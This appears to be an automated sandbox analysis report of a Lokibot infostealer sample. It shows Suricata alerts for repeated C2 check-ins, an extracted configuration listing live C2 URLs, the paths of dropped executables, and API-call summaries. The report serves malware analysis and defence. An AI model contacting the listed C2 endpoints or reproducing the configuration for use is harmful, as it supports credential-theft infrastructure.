2025-01-07T11:02:51.916359+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50015	172.245.123.11	80	TCP
2025-01-07T11:02:52.618644+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50020	172.245.123.11	80	TCP
2025-01-07T11:02:53.273172+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50026	172.245.123.11	80	TCP
2025-01-07T11:02:53.936803+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50032	172.245.123.11	80	TCP
2025-01-07T11:02:55.171759+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50038	172.245.123.11	80	TCP
2025-01-07T11:02:55.829665+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50044	172.245.123.11	80	TCP
2025-01-07T11:02:56.557892+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50050	172.245.123.11	80	TCP
2025-01-07T11:02:57.234366+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50055	172.245.123.11	80	TCP
2025-01-07T11:02:57.904891+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50061	172.245.123.11	80	TCP
2025-01-07T11:02:58.574189+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50066	172.245.123.11	80	TCP
2025-01-07T11:02:59.229112+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50067	172.245.123.11	80	TCP
2025-01-07T11:02:59.900572+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50068	172.245.123.11	80	TCP
2025-01-07T11:03:00.558517+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50069	172.245.123.11	80	TCP
2025-01-07T11:03:01.212085+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50070	172.245.123.11	80	TCP
2025-01-07T11:03:01.900649+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50071	172.245.123.11	80	TCP
2025-01-07T11:03:02.675531+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50072	172.245.123.11	80	TCP
2025-01-07T11:03:03.337291+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50073	172.245.123.11	80	TCP
2025-01-07T11:03:04.013533+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50074	172.245.123.11	80	TCP
2025-01-07T11:03:04.679878+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50075	172.245.123.11	80	TCP
2025-01-07T11:03:05.319446+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50076	172.245.123.11	80	TCP
2025-01-07T11:03:05.975970+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50077	172.245.123.11	80	TCP
2025-01-07T11:03:06.639844+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50078	172.245.123.11	80	TCP
2025-01-07T11:03:07.327650+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50079	172.245.123.11	80	TCP
2025-01-07T11:03:08.132275+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50080	172.245.123.11	80	TCP
2025-01-07T11:03:08.806380+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50081	172.245.123.11	80	TCP
2025-01-07T11:03:09.459976+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50082	172.245.123.11	80	TCP
2025-01-07T11:03:10.132210+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50083	172.245.123.11	80	TCP
2025-01-07T11:03:10.788630+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50084	172.245.123.11	80	TCP
2025-01-07T11:03:11.460089+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50085	172.245.123.11	80	TCP
2025-01-07T11:03:12.127099+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50086	172.245.123.11	80	TCP
2025-01-07T11:03:12.756187+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50087	172.245.123.11	80	TCP
2025-01-07T11:03:13.399253+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50088	172.245.123.11	80	TCP
2025-01-07T11:03:14.117177+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50089	172.245.123.11	80	TCP
2025-01-07T11:03:14.771734+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50090	172.245.123.11	80	TCP
2025-01-07T11:03:15.503726+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50091	172.245.123.11	80	TCP
2025-01-07T11:03:16.146706+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50092	172.245.123.11	80	TCP
2025-01-07T11:03:16.829444+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50093	172.245.123.11	80	TCP
2025-01-07T11:03:17.571531+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50094	172.245.123.11	80	TCP
2025-01-07T11:03:18.224687+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50095	172.245.123.11	80	TCP
2025-01-07T11:03:18.881699+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50096	172.245.123.11	80	TCP
2025-01-07T11:03:19.523285+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50097	172.245.123.11	80	TCP
2025-01-07T11:03:20.196458+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50098	172.245.123.11	80	TCP
2025-01-07T11:03:20.851457+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50099	172.245.123.11	80	TCP
2025-01-07T11:03:21.507813+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50100	172.245.123.11	80	TCP
2025-01-07T11:03:22.176021+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50101	172.245.123.11	80	TCP
2025-01-07T11:03:23.213434+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50102	172.245.123.11	80	TCP
2025-01-07T11:03:24.151005+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50103	172.245.123.11	80	TCP
2025-01-07T11:03:24.824519+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50104	172.245.123.11	80	TCP
2025-01-07T11:03:26.710640+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50105	172.245.123.11	80	TCP
2025-01-07T11:03:27.380300+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50106	172.245.123.11	80	TCP
2025-01-07T11:03:28.015736+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50107	172.245.123.11	80	TCP
2025-01-07T11:03:28.703037+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50108	172.245.123.11	80	TCP
2025-01-07T11:03:29.349451+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50109	172.245.123.11	80	TCP
2025-01-07T11:03:30.026092+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50110	172.245.123.11	80	TCP
2025-01-07T11:03:30.701445+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50111	172.245.123.11	80	TCP
2025-01-07T11:03:31.406580+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50112	172.245.123.11	80	TCP
2025-01-07T11:03:32.067627+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50113	172.245.123.11	80	TCP
2025-01-07T11:03:32.733953+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50114	172.245.123.11	80	TCP
2025-01-07T11:03:33.433270+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50115	172.245.123.11	80	TCP
2025-01-07T11:03:34.782674+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50116	172.245.123.11	80	TCP
2025-01-07T11:03:35.422766+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50117	172.245.123.11	80	TCP
2025-01-07T11:03:36.111250+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50118	172.245.123.11	80	TCP
2025-01-07T11:03:36.787347+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50119	172.245.123.11	80	TCP
2025-01-07T11:03:37.443278+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50120	172.245.123.11	80	TCP
2025-01-07T11:03:38.078880+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50121	172.245.123.11	80	TCP
2025-01-07T11:03:38.720674+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50122	172.245.123.11	80	TCP
2025-01-07T11:03:39.392736+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50123	172.245.123.11	80	TCP
2025-01-07T11:03:40.062714+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50124	172.245.123.11	80	TCP
2025-01-07T11:03:40.725262+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50125	172.245.123.11	80	TCP
2025-01-07T11:03:41.427015+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50126	172.245.123.11	80	TCP
2025-01-07T11:03:42.077854+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50127	172.245.123.11	80	TCP
2025-01-07T11:03:42.718228+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50128	172.245.123.11	80	TCP
2025-01-07T11:03:43.373897+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50129	172.245.123.11	80	TCP
2025-01-07T11:03:44.064476+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50130	172.245.123.11	80	TCP
2025-01-07T11:03:44.703993+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50131	172.245.123.11	80	TCP
2025-01-07T11:03:45.361356+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50132	172.245.123.11	80	TCP
2025-01-07T11:03:46.021356+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50133	172.245.123.11	80	TCP
2025-01-07T11:03:46.728055+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50134	172.245.123.11	80	TCP
2025-01-07T11:03:47.390462+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50135	172.245.123.11	80	TCP
2025-01-07T11:03:48.079188+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50136	172.245.123.11	80	TCP
2025-01-07T11:03:48.750749+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50137	172.245.123.11	80	TCP
2025-01-07T11:03:49.450939+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50138	172.245.123.11	80	TCP
2025-01-07T11:03:50.093929+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50139	172.245.123.11	80	TCP
2025-01-07T11:03:50.740699+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50140	172.245.123.11	80	TCP
2025-01-07T11:03:51.391659+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50141	172.245.123.11	80	TCP
2025-01-07T11:03:52.063134+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50142	172.245.123.11	80	TCP
2025-01-07T11:03:52.739569+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50143	172.245.123.11	80	TCP
2025-01-07T11:03:53.390870+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50144	172.245.123.11	80	TCP
2025-01-07T11:03:54.062572+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50145	172.245.123.11	80	TCP
2025-01-07T11:03:54.718933+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50146	172.245.123.11	80	TCP
2025-01-07T11:03:55.375592+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50147	172.245.123.11	80	TCP
2025-01-07T11:03:56.016359+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50148	172.245.123.11	80	TCP
2025-01-07T11:03:56.672622+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50149	172.245.123.11	80	TCP
2025-01-07T11:03:57.344266+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50150	172.245.123.11	80	TCP
2025-01-07T11:03:58.028337+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50151	172.245.123.11	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://172.245.123.11/tpm/fre.php

Avira URL Cloud: Label: malware

Found malware configuration

Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://172.245.123.11/tpm/fre.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe

ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: 9876567899.bat.exe

Virustotal: Detection: 29%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\JOHP[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Wnuth.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 9876567899.bat.exe

Joe Sandbox ML: detected

Source: 9876567899.bat.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.5:49713 version: TLS 1.2

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Dhy2kmz.exe, 00000004.00000002.2170113887.0000000006900000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: palladiums.exe, 00000002.00000003.2024229175.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000002.00000003.2024732170.0000000003A10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: palladiums.exe, 00000002.00000003.2024229175.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000002.00000003.2024732170.0000000003A10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Dhy2kmz.exe, 00000004.00000002.2170113887.0000000006900000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0074C2A2 FindFirstFileExW,	0_2_0074C2A2
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_007868EE FindFirstFileW,FindClose,	0_2_007868EE
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0078698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0078698F
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0077D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0077D076
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0077D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0077D3A9
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00789642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00789642
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0078979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0078979D
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00789B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00789B2B
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0077DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0077DBBE
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00785C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00785C97
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_0006C2A2 FindFirstFileExW,	2_2_0006C2A2
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000A68EE FindFirstFileW,FindClose,	2_2_000A68EE
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	2_2_000A698F
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_0009D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0009D076
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_0009D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0009D3A9
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_000A9642
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_000A979D
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_000A9B2B
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_0009DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0009DBBE
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000A5C97 FindFirstFileW,FindNextFileW,FindClose,	2_2_000A5C97

Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4x nop then jmp 064DE439h	4_2_064DE250
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4x nop then jmp 064DE439h	4_2_064DE260
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4x nop then jmp 064DE439h	4_2_064DE211
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4x nop then jmp 064DDEC2h	4_2_064DDB10
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4x nop then jmp 064DDEC2h	4_2_064DDB20
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4x nop then jmp 06684559h	4_2_066845D3
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4x nop then jmp 06684559h	4_2_066842C8
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Code function: 4x nop then jmp 06684559h	4_2_066842B8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49715 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49715 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49715 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49711 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49711 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49711 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49710 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49715 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49715 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49717 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49717 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49710 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49711 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49717 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49711 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49734 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49734 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49734 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49710 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49732 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49714 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49732 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49723 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49722 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49714 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49714 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49723 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49717 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49723 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49722 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49718 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49732 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49718 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49736 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49718 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49736 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49717 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49736 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49714 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49714 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49722 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49709 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49709 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49709 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49742 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49742 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49742 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49709 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49709 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49716 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49736 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49741 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49722 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49736 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49766 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49766 -> 172.245.123.11:80
